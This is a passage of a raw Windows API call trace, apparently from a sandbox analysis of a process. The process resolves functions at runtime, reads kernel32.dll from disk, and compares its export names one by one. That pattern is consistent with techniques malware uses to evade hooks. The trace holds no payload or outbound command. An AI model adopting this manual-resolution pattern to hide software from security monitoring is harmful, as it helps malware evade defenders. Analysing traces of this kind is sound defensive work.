0x7ffc5ecf0c60 [0216.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0216.308] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0216.308] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0216.309] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0216.309] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0216.309] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0216.309] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0216.309] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0216.309] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0216.309] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0216.310] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x57db50 | out: hHeap=0x550000) returned 1 [0216.311] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0216.319] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x560820 | out: hHeap=0x550000) returned 1 [0216.321] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0216.321] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0216.322] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0216.322] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0216.322] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0216.322] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0216.324] GetProcessHeap () returned 0x550000 [0216.324] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x68) returned 0x558d50 [0216.324] GetProcessHeap () returned 0x550000 [0216.324] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x569070 [0216.325] GetProcessHeap () returned 0x550000 [0216.325] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x48) returned 0x55ff60 [0216.325] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0216.325] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0216.325] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0216.325] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0216.326] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0216.326] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0216.326] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0216.326] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0216.326] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0216.326] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0216.326] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0216.327] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0216.822] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0216.822] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0216.822] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0216.822] GetProcessHeap () returned 0x550000 [0216.822] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xac430) returned 0x57c600 [0216.825] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0216.825] ReadFile (in: hFile=0x134, lpBuffer=0x57c600, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x57c600*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0216.845] CloseHandle (hObject=0x134) returned 1 [0216.846] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0216.853] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0216.853] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0216.853] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0216.853] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0216.854] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0216.854] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0216.854] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0216.854] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0216.854] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0216.854] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0216.854] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0216.854] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0216.854] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0216.854] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0216.854] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0216.854] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0216.854] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0216.854] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0216.854] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0216.854] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0216.854] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0216.854] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0216.854] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0216.854] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0216.855] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0216.855] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0216.855] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0216.855] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0216.855] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0216.855] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0216.855] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0216.855] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0216.855] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0216.855] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0216.855] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0216.855] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0216.855] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0216.855] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0216.855] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0216.855] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0216.855] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0216.855] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0216.855] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0216.855] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0216.855] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0216.855] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0216.855] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0216.855] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0216.855] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0216.856] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0216.856] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0216.856] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0216.856] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0216.856] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0216.856] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0216.856] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0216.856] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0216.856] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0216.857] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0216.857] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0216.857] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0216.857] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0216.857] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0216.857] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0216.857] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0216.857] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0216.857] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0216.857] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0216.857] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0216.858] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0216.858] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0216.858] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0216.858] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0216.858] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0216.858] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0216.858] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0216.858] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0216.858] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0216.859] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0216.859] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0216.859] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0216.859] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0216.859] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0216.859] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0216.859] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0216.859] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0216.859] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0216.859] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0216.859] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0216.859] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0216.859] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0216.859] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0216.860] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0216.860] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0216.860] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0216.860] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0216.860] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0216.860] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0216.861] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0216.861] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0216.861] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0216.861] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0216.861] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0216.862] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0216.862] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0216.862] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0216.862] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0216.862] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0216.863] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 